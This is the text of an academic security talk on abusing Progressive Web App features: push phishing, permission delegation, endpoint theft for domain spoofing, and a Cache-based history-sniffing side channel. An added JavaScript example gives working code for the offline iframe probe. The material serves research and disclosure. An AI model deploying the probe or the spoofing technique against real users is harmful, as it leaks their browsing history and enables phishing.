
Pride and Prejudice in Progressive Web Apps: Abusing Native App-like Features in Web Applications (PowerPoint PPT presentation)


  1. Pride and Prejudice in Progressive Web Apps: Abusing Native App-like Features in Web Applications
  Jiyeon Lee, Hayeon Kim, Junghwan Park, Insik Shin, Sooel Son
  School of Computing, Graduate School of Information Security

  2. Limitations of Web Apps
  • Users spend most of their time in native apps
  • Reasons:
    ⁻ Heavily depend on the network connection
    ⁻ Low user engagement
  Average minutes per visitor: Apps 188.6, Webs 9.3 (Source: comScore Mobile Metrix, U.S., Age 18+, June 2016)

  3. Limitations of Native Apps
  • App usage is highly concentrated
  • Reasons:
    ⁻ High cost
    ⁻ Difficult to share
  Monthly unique visitors (M): Webs 11.4, Apps 4.0 (Source: comScore Mobile Metrix, U.S., Age 18+, June 2016)

  4. Progressive Web Apps (PWAs)
  • Introduced by Google in 2015
  • Three design goals: reliable, fast, engaging
  • Success stories
    ⁻ Twitter Lite
    ⁻ Financial Times
    ⁻ Forbes
  (Figure: Push Notifications, Add to Home Screen, Offline Browsing)

  5. Progressive Web Apps (PWAs): Core Components
  1) Service Worker
  2) Cache
  3) Push
  (Figure: Service Worker, Cache and Push behind Push Notifications, Add to Home Screen and Offline Browsing)

  6. This Study
  • We address the security and privacy risks of PWAs
  • Vulnerabilities:
    1) Service Worker → Cryptocurrency Mining
    2) Cache → Inferring User's Browsing History
    3) Push → Phishing Attack

  7. Technology behind PWAs: Service Worker
  • HTML5 Web standard technology
  • Supported by most browsers:
    ⁻ Firefox 44+, Chrome 45+, Edge 17+, Opera 32+
  • Only usable on HTTPS websites (secure contexts; localhost also counts as secure for development, which is why a later screenshot shows localhost:8000)
  • Able to run in the background even after a user leaves the website
  (Figure: web app ↔ service worker ↔ network)

  8. Offline Browsing
  • Cache is origin-bound local storage
  • Accessible regardless of the network status
  • Provides programmable offline interfaces together with the Service Worker
  (Figure: internet ↔ service worker ↔ cache)

  9. Web Push Notifications
  • Re-engage users with customized content
  • Can be received by the Service Worker even if the browser is closed
  (Figure: web server → push server → service worker)
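The three components from slides 7 to 9 wired together, as an added example written for this page (it is not code from the talk or its authors). One file serves as both the service worker (`/sw.js`) and the page script; the cache name, the precache list, the subscribe endpoint `/api/push/subscribe` and the icon path `/icon-192.png` are assumed names. The push handler shows the one hardening a practitioner wants here: the payload may name any title, body and icon, so the icon is only honoured when it is same-origin.

```javascript
// Added example, not the talk's code. Assumed names: CACHE_NAME, PRECACHE,
// DEFAULT_ICON, '/sw.js', '/api/push/subscribe'.
'use strict';

const CACHE_NAME = 'pwa-demo-v1';                     // assumed cache name
const PRECACHE = ['/', '/app.js', '/offline.html'];   // assumed app shell
const DEFAULT_ICON = '/icon-192.png';                 // assumed same-origin icon

// applicationServerKey must be the raw P-256 point as a Uint8Array; the
// server usually hands it out base64url-encoded.
function urlBase64ToUint8Array(base64String) {
  const padding = '='.repeat((4 - (base64String.length % 4)) % 4);
  const base64 = (base64String + padding).replace(/-/g, '+').replace(/_/g, '/');
  const raw = typeof atob === 'function'
    ? atob(base64)
    : Buffer.from(base64, 'base64').toString('binary');
  return Uint8Array.from(raw, (ch) => ch.charCodeAt(0));
}

// Build notification options from a push payload. The browser shows the
// origin; title, body and icon come from whoever posted the message, so a
// cross-origin icon is replaced by our own default.
function notificationFromPayload(payloadText, origin) {
  let data;
  try { data = JSON.parse(payloadText); } catch (e) { data = null; }
  if (!data || typeof data !== 'object') data = { body: payloadText };
  const title = typeof data.title === 'string' ? data.title : 'New message';
  const body = typeof data.body === 'string' ? data.body : '';
  let icon = new URL(DEFAULT_ICON, origin).href;
  if (typeof data.icon === 'string') {
    try {
      const u = new URL(data.icon, origin);
      if (u.origin === origin) icon = u.href;
    } catch (e) { /* unparsable icon URL: keep the default */ }
  }
  return { title, body, icon };
}

// ---- service worker side (sw.js) ----
if (typeof ServiceWorkerGlobalScope !== 'undefined' && self instanceof ServiceWorkerGlobalScope) {
  self.addEventListener('install', (event) => {
    event.waitUntil(caches.open(CACHE_NAME).then((cache) => cache.addAll(PRECACHE)));
  });

  // Cache-first: anything cached is served even with no network at all.
  self.addEventListener('fetch', (event) => {
    if (event.request.method !== 'GET') return;
    event.respondWith(
      caches.match(event.request).then((cached) => cached || fetch(event.request).then((resp) => {
        if (resp.ok && new URL(event.request.url).origin === self.location.origin) {
          const copy = resp.clone();
          caches.open(CACHE_NAME).then((cache) => cache.put(event.request, copy));
        }
        return resp;
      }).catch(() => caches.match('/offline.html')))
    );
  });

  self.addEventListener('push', (event) => {
    const text = event.data ? event.data.text() : '';
    const n = notificationFromPayload(text, self.location.origin);
    event.waitUntil(self.registration.showNotification(n.title, { body: n.body, icon: n.icon }));
  });
}

// ---- page side (app.js) ----
async function registerAndSubscribe(vapidPublicKey) {
  const reg = await navigator.serviceWorker.register('/sw.js');
  const sub = await reg.pushManager.subscribe({
    userVisibleOnly: true,
    applicationServerKey: urlBase64ToUint8Array(vapidPublicKey),
  });
  // The endpoint is a capability URL: hand it to the app server over HTTPS only.
  await fetch('/api/push/subscribe', {
    method: 'POST',
    headers: { 'content-type': 'application/json' },
    body: JSON.stringify(sub),
  });
  return sub;
}
```

Run as `/sw.js` the worker branch installs the app shell and answers fetches cache-first; loaded as a page script, `registerAndSubscribe(publicKey)` registers that worker and posts the subscription to the app server. The two pure helpers run under Node as well, which is how they are checked.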

  10. How Many PWAs Exist in the Wild?
  • A PWA is a website that registers a Service Worker
  • Collected from the Alexa top 100,000 websites
  Features used      Number of websites
  Push               3,351 (80.5%)
  Cache                513 (12.3%)
  Both                 196 (4.7%)
  Others               495 (11.9%)
  Total              4,163 (100%)
  (The Push and Cache rows each include the 196 sites that use both, so the percentages do not add up to 100%: 3,351 + 513 + 495 - 196 = 4,163.)

  11. I-I. Phishing Risks of Web Push

  12. General Appearance of Web Push (screenshot)

  13. General Appearance of Web Push: elements ICON, TITLE, DOMAIN, BODY

  14. Sender Can Customize: ICON, TITLE, BODY

  15. Sender Can Not Customize: DOMAIN
  • The domain name is the only element representing the source of a push message (localhost:8000 in the screenshot)

  16. Vulnerabilities We Found
  • Environments that do not display domains:
    ⁻ Firefox on GNOME, Ubuntu MATE, Cinnamon, Budgie, and Pantheon
    ⁻ Samsung Internet, Firefox on Android
  • Causes phishing risks
  (Figure: push without domain vs. push with domain, in Firefox, Chrome and Samsung Internet)

  17. I-II. Phishing Risks of Third-Party Push Libraries

  18. Emerging Third-party Push Services
  • Enable website owners to use push features
  • Provide useful features:
    ⁻ Scheduling push notifications, reporting subscriber statistics, supporting HTTP websites
  Image source: https://sendpulse.com/features/webpush

  19-22. How Push is Supported on HTTP Sites
  • An actual permission dialog that the browser asks, versus a CSS-styled permission dialog that is drawn by the library
  • The library binds the address of the (HTTP) website that the user visits to an HTTPS domain that the library creates; since Service Workers and push are only available on HTTPS, the real subscription belongs to that HTTPS domain, not to the site the user typed in

  23. Permission Delegation Attack
  • A network attacker can redirect users to an attacker-controlled website (the hop from the HTTP page to the library's HTTPS domain can be rewritten in transit)
  • A visitor has no clue why she is redirected to a different domain
  (Figure: a dialog "Allow http://benign.com to send notifications?" labelled "Powered by library" while the page is in fact "Powered by Attacker")

  24. I-III. Domain Name Spoofing Attack of Web Push Notifications

  25-29. Web Push in Detail
  Participants: the web app and its service worker (in the browser), the push server, and the web server.
  1. The web app asks for notification permission (the user answers Yes)
  2. The browser subscribes to the push service
  3. The push service returns a generated endpoint URL
  4. The endpoint is sent to the web server
  5. The web server stores the endpoint
  6. The web server sends a push message to the endpoint
  7. The push service sends the push message to the browser
  8. The browser sends the push message to the service worker
  An example endpoint URL:
  https://fcm.googleapis.com/fcm/send/dTb6ILBpUYs:APA91bGX_Xa91bizHC-ol0qF9fj7f2u9lt3mExBdbhGsE0zCuXkPJioWDgo4wf1mTfZYgqX_-sVWRabWqx3GB9XiA9hsUf-gVnwkkbD8oDLAUIhScYYrmeSZaricyZv3gq3hbzjh48Ad
  The endpoint URL is confidential information! Without VAPID (next slide), anyone who learns it can post messages to that subscription.

  30. Web Push Protocol: VAPID
  • Designed to authenticate web servers
  • Utilizes asymmetric key pairs
    ⁻ Without the private key, one cannot send push messages
  Flow with VAPID (the web server holds the private key; the browser and push service only see the public key):
  1. Permission asking (the user answers Yes)
  2. Subscribe to the push service
  3. Get the generated endpoint and encryption key
  4. Send the endpoint and encryption key to the web server
  5. Store the endpoint and encryption keys
  6. Send the encrypted payload to the endpoint
  7. The payload received on the URL is sent to the browser
  8. The payload is decrypted and sent to the service worker

  31. VAPID in the Wild
  Third-party library   VAPID
  SendPulse             X
  Izooto                X
  Pushwoosh             X
  Foxpush               X
  OneSignal
  Pushcrew              X
  Pushengage            X
  Urbanairship
  (X = the library does not use VAPID; the two without an X, OneSignal and Urbanairship, are the ones that do)

  32. Domain Spoofing Attack
  • In step 4 the endpoint is sent to the web server over HTTP, so a network attacker can read it
  • The attacker posts a push message to the stolen endpoint; with no VAPID check in place the push service accepts it, and the notification appears under the spoofed domain "kirannewsagency.iz.do"
  (Same eight-step flow as slide 30, with a network attacker sitting between the browser and the web server)

  33. Why Phishing via Web Push Matters
  • Difficult to determine the origin of messages
  • An attacker can send push messages at any time
  (Figure: real-world phishing notification)

  34. II. User Privacy Leak via Offline Usage

  35. History Sniffing Attack
  • Critical privacy threat
    ⁻ E. Felten et al., Timing Attacks on Web Privacy [CCS 2000]
    ⁻ Z. Weinberg et al., I Still Know What You Visited Last Summer: Leaking Browsing History via User Interaction and Side Channel Attacks [S&P 2011]
    ⁻ S. Son et al., What Mobile Ads Know About Mobile Users [NDSS 2016]
  • Can leak personal information

  36-39. History Sniffing Attack on PWAs
  • A new side channel attack that exploits Cache
  • How it works:
    1. A victim opens the attacking PWA (https://attacker-pwa.com) offline; the page embeds an iframe for each target PWA (iframe of target 1, iframe of target 2, ...)
    2. Each iframe has an onload event handler; the onload event is only triggered if the victim has visited the target PWA, because only then does the target's own service worker answer the frame from its Cache
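The probe from slides 36 to 39 as an added example (written for this page, not the authors' code). The only browser-specific step, loading a target in a hidden frame and waiting for its load event, is passed in as a function, so the same race-against-timeout logic can be exercised under Node with a stand-in that behaves the way the slides describe: visited PWAs fire load from Cache, unvisited ones never do because there is no network. The target origins and the timeout are constructed for illustration.

```javascript
// Added example, not the talk's code. Target origins and timeouts are made up.
'use strict';

// Probe each target while offline. A target counts as visited only if its
// load event fires before the timeout; per the slides that happens when the
// target's service worker serves the frame from Cache.
function sniffHistory(targets, loadProbe, timeoutMs = 3000) {
  return Promise.all(targets.map((target) => new Promise((resolve) => {
    let done = false;
    const finish = (visited) => { if (!done) { done = true; resolve([target, visited]); } };
    const timer = setTimeout(() => finish(false), timeoutMs);
    loadProbe(target, () => { clearTimeout(timer); finish(true); });
  }))).then((pairs) => new Map(pairs));
}

// Browser implementation of loadProbe: one hidden <iframe> per target.
function iframeProbe(url, onLoad) {
  const frame = document.createElement('iframe');
  frame.style.display = 'none';
  frame.addEventListener('load', onLoad, { once: true });
  frame.src = url;
  document.body.appendChild(frame);
}

// Stand-in used when this file runs under Node: origins in cachedOrigins act
// like previously visited PWAs (load fires from Cache); all others hang.
function makeOfflineSimulator(cachedOrigins) {
  return (url, onLoad) => {
    if (cachedOrigins.has(new URL(url).origin)) setTimeout(onLoad, 5);
  };
}

// Entry point for the attacker page: refuse to run while online, because a
// load event coming from the network would tell us nothing about Cache.
async function runInBrowser(targets) {
  if (navigator.onLine) throw new Error('probe is only meaningful offline');
  return sniffHistory(targets, iframeProbe);
}
```

Under Node, `sniffHistory(targets, makeOfflineSimulator(new Set([...])), 60)` resolves to a Map from target to a boolean; in a browser the same function is driven by `iframeProbe`, and the timeout is the whole side channel: a frame that never finishes loading is one whose origin has no service worker with that page in its Cache.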
